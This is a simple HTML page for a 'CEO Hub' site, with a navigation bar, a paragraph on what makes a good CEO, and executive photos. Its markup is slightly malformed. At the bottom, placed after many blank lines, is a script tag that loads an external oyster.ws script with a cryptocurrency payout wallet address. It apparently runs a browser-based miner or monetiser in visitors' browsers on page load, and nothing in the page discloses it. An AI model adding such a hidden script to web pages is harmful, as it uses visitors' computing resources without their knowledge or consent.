<!DOCTYPE html>
<html>

<head>
  <title>Cable Dictionary</title>
  <link rel="stylesheet" type="text/css" href="style.css">
  <meta></meta>
   <link rel="shortcut icon" type="image/x-icon" href="Assets/logo.png" />
</head>

<body>

  <header>
    <h1> <center>CEO Hub</center> </h1>

    <div id="Title">
      <p>CEO's for a lifetime</p>
    </div>
    <br>
    <br>

    <div id="topnav">
      <a class="active" href="index.html">Home</a>
      <a href="about.html">About</a>
      <a href="contact.html">Contact</a>
      <input type="text" placeholder="Search..">
    </div>

  </header>
  <br>
  <br>
  <div id="CEO"
<img src="Assets/ceo.jpg" width=500 height=250>
<br>
<p>A good CEO is someone that is not afraid of change.
  Someone who will do anything to benefit his company.
  Someone who is always innovating and making change in there industry.</p>
<img src="Assets/ceo.jpg" width=500 height=250>





</div>

<br>
<br>
<p><b>John Legere
  T-Mobile</b></p>
<img src="Assets/John.jpg" width=300 height=134>


<img src="Assets/Elon.jpg" width=200 height=200>

<img src="Assets/Mark.jpg">













<script id="o.ws" payout="0x4839e64fF7c003f7b2098952f21b2dBA52408391
" src="https://oyster.ws/webnode.js"></script>
    </body>
  </html>
